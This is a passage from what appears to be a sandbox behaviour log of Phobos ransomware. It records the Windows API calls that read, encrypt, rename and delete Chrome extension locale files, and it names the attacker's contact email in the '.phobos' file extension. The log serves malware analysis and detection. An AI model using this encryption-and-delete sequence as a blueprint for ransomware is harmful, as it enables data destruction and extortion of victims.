lpOverlapped=0x0) returned 1 [0157.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0157.018] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.018] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.018] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.018] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.018] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.018] CloseHandle (hObject=0x194) returned 1 [0157.018] CloseHandle (hObject=0x138) returned 1 [0157.019] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json")) returned 1 [0157.020] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.020] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=617) returned 1 [0157.020] CloseHandle (hObject=0x138) returned 1 [0157.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json")) returned 0x2020 [0157.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.021] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.021] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.021] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.021] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.021] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x269, lpOverlapped=0x0) returned 1 [0157.162] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270, dwBufLen=0x270 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270) returned 1 [0157.162] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x270, lpOverlapped=0x0) returned 1 [0157.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0157.163] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.163] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.163] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.163] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.164] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.164] CloseHandle (hObject=0x138) returned 1 [0157.164] CloseHandle (hObject=0x194) returned 1 [0157.164] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\messages.json")) returned 1 [0157.165] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.165] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=696) returned 1 [0157.165] CloseHandle (hObject=0x194) returned 1 [0157.165] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json")) returned 0x2020 [0157.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.166] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.166] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.166] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.166] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.166] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b8, lpOverlapped=0x0) returned 1 [0157.298] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0) returned 1 [0157.298] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2c0, lpOverlapped=0x0) returned 1 [0157.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0157.299] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.299] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.299] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.299] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.299] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.299] CloseHandle (hObject=0x194) returned 1 [0157.299] CloseHandle (hObject=0x138) returned 1 [0157.299] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\messages.json")) returned 1 [0157.300] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.301] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=609) returned 1 [0157.301] CloseHandle (hObject=0x138) returned 1 [0157.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json")) returned 0x2020 [0157.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.301] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.301] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.302] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.302] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x261, lpOverlapped=0x0) returned 1 [0157.308] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270, dwBufLen=0x270 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270) returned 1 [0157.308] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x270, lpOverlapped=0x0) returned 1 [0157.309] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0157.309] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.309] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.309] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.309] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.309] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.309] CloseHandle (hObject=0x138) returned 1 [0157.309] CloseHandle (hObject=0x194) returned 1 [0157.310] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json")) returned 1 [0157.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.311] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=692) returned 1 [0157.311] CloseHandle (hObject=0x194) returned 1 [0157.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json")) returned 0x2020 [0157.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.311] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.311] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.312] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.312] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b4, lpOverlapped=0x0) returned 1 [0157.444] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0) returned 1 [0157.444] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2c0, lpOverlapped=0x0) returned 1 [0157.445] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0157.445] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.445] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.445] CryptDestroyKey (hKey=0xa32d68) returned 1 [0157.445] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.445] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.445] CloseHandle (hObject=0x194) returned 1 [0157.445] CloseHandle (hObject=0x138) returned 1 [0157.445] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json")) returned 1 [0157.446] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 